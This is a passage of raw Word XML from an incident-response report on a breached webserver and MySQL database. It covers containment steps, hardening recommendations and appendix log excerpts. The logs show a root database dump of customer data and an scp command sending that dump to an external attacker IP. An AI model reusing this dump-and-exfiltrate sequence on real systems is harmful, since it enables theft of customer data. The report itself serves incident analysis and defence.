    <w:p w14:paraId="5A2AA794" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="316BCF27" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="0FF6E4B6" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="0DB0CFEB" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="53252DE1" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="35C5B5DB" w14:textId="602D9322" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="009F25F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc180595379"/>
      <w:r w:rsidRPr="002817B5">
        <w:lastRenderedPageBreak/>
        <w:t>Incident Response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE643A" w14:textId="5A391D00" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="009F25F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc180595380"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Measures Used to Stop and Address the Incident</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7AB804D2" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disconnect the affected systems:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> The compromised webserver and database were immediately disconnected from the network to stop any further data leakage and access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DE0F5" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rotation of admin and root credential:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> All admin and root credentials were rotated for the webserver and database. All admin accounts now require multi-factor authentication (MFA). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBC370" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Block infected IPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> addresses used in the attack (178.62.228.28) were relegated to firewall block for future use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B156E83" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> In-depth forensic investigation was done on the systems involved to assess the extent of the attack and verify that no other backdoors or malware were buried. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D8032" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System logs analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> The webserver, database and network logs were analysed to ensure full severity of the attack and uncover other suspicious activity (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> (1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>))(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526BA128" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="06124EB5" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="009F25F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc180595381"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Post-Incident Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07622915" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="009F25F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc180595382"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Future Protection Against Similar Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCECE5D" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Segmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Use network segmentation by putting the database on its own secure VLAN, independent of the webserver and other resources. This will make it hard for the attacker to switch between systems (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFA76B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege management and Hardening:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Use role-based access control (RBAC) using the least privilege. Do not let services or users go root without multiple approval and review stages (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64568158" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Security Enhancements:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD0620" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Restrict MySQL access based on hosts, so only certain trusted hosts can access the database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0EED0" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Encrypt data backups and data in transit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F667EB3" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Use SQL monitoring tools for suspicious queries and rate-limiting sensitive operations (e.g., exports of data). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A176A66" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 4.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patching and Regular Vulnerability Checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59AEEF" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t>o Regular vulnerability scanning and patching (especially on publicly exposed services such as the webserver) to stay away from common exploits (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E98E589" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Use penetration testing to find security holes in the system and fix them before an attacker can get at them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA8305" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 5.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incident Response Training and Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71573F" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Create and update an incident response strategy that includes protocols to isolate and examine compromised systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592CCC19" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Continually train staff on incident response procedures and simulate attack scenarios for faster time to react and response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ECE79" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="009F25F3" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Policy Adjustments  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563C74F" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logging and Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1E2E3" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Improve logging on all mission-critical systems to log deeper activity information, especially for database access and admin commands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9F95B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Create a central logging server, collects logs from all systems, and has alerting functionality to alert the security team on suspicious activity. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FD833" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> 2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apply Reliable Password/Auth Policies:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5E295" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o Demand complex passwords for all users (particularly administrators) and change them frequently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659267F6" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">o MFA all admin users on all services (including the database). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB2FB2" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="0E5185A7" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="009F25F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc180595383"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880FDCE" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> • Network Diagram: (Attached)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795B322" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t>• Log Files: Malicious access logs of webservers (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> (1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>))(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>). Access logs to the database with unauthorized queries (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E79C235" w14:textId="0505FD64" w:rsidR="00767AE7" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002817B5">
        <w:t>• Shell history logs showing database leak (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301B676" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00E14676">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc180595384"/>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MySQL Database Access Logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="03C1A357" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The MySQL database access logs show the moment when the attacker connected to the database and executed unauthorized SQL queries to retrieve customer data. The logs also capture the exfiltration of this data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBB459" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A3E53F" w14:textId="7A644659" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Log entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E74E8" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7CC04" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A5FDD" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:00:55 [Note] Access granted for user 'root'@'localhost' on database 'phl'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C73C9" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:00:56 Query: SELECT * FROM customer_data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692AFFA" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:01:45 Query: mysqldump -u root -p phl &gt; /tmp/phl_db_backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32ADCA" w14:textId="7BA23B15" w:rsidR="00063466" w:rsidRDefault="00767AE7" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>These logs confirm that the attacker gained root access to the database and performed a database dump of sensitive customer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018FC57" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0586EBCB" w14:textId="79420C26" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00E14676">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc180595385"/>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Network Logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="24106FEA" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The network logs revealed the final stage of the attack, where the attacker used SCP to exfiltrate the database dump to an external IP address. The connection to the attacker's server is shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF33C7C" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A21B15" w14:textId="23966D7E" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Log entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F5BB83" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2763FD" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E339AC0" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:02:26 scp /tmp/phl_db_backup.sql root@178.62.228.28:/home/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75347B5A" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E70E94" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
